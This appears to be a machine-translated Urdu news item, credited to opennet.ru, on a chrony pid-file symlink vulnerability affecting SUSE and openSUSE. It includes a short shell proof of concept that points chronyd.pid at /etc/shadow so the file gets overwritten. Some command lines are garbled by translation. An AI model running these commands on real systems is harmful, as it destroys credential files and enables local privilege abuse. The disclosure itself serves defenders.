В
کمزوری pid فائل کی غیر محفوظ تخلیق کی وجہ سے ہوتی ہے، جو ایک ایسے مرحلے پر بنائی گئی تھی جب chrony نے ابھی تک مراعات کو دوبارہ ترتیب نہیں دیا تھا اور روٹ کے طور پر چل رہا تھا۔ اس صورت میں، /run/chrony ڈائریکٹری، جس میں pid فائل لکھی گئی ہے، 0750 حقوق کے ساتھ systemd-tmpfiles کے ذریعے بنائی گئی تھی یا جب chronyd کو صارف اور گروپ "chrony" کے ساتھ مل کر لانچ کیا گیا تھا۔ اس طرح، اگر آپ کو صارف chrony تک رسائی حاصل ہے تو، pid فائل کو /run/chrony/chronyd.pid کو علامتی لنک سے تبدیل کرنا ممکن ہے۔ ایک علامتی لنک کسی بھی سسٹم فائل کی طرف اشارہ کر سکتا ہے جو chronyd شروع ہونے پر اوور رائٹ ہو جائے گی۔
root# systemctl stop chronyd.service
جڑ# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ سے باہر نکلیں۔
root# /usr/sbin/chronyd -n
^C
# /etc/shadow کے مواد کی بجائے chronyd process ID کو محفوظ کیا جائے گا۔
جڑ # cat /etc/shadow
15287
کمزوری
SUSE اور openSUSE کا مسئلہ
ماخذ: opennet.ru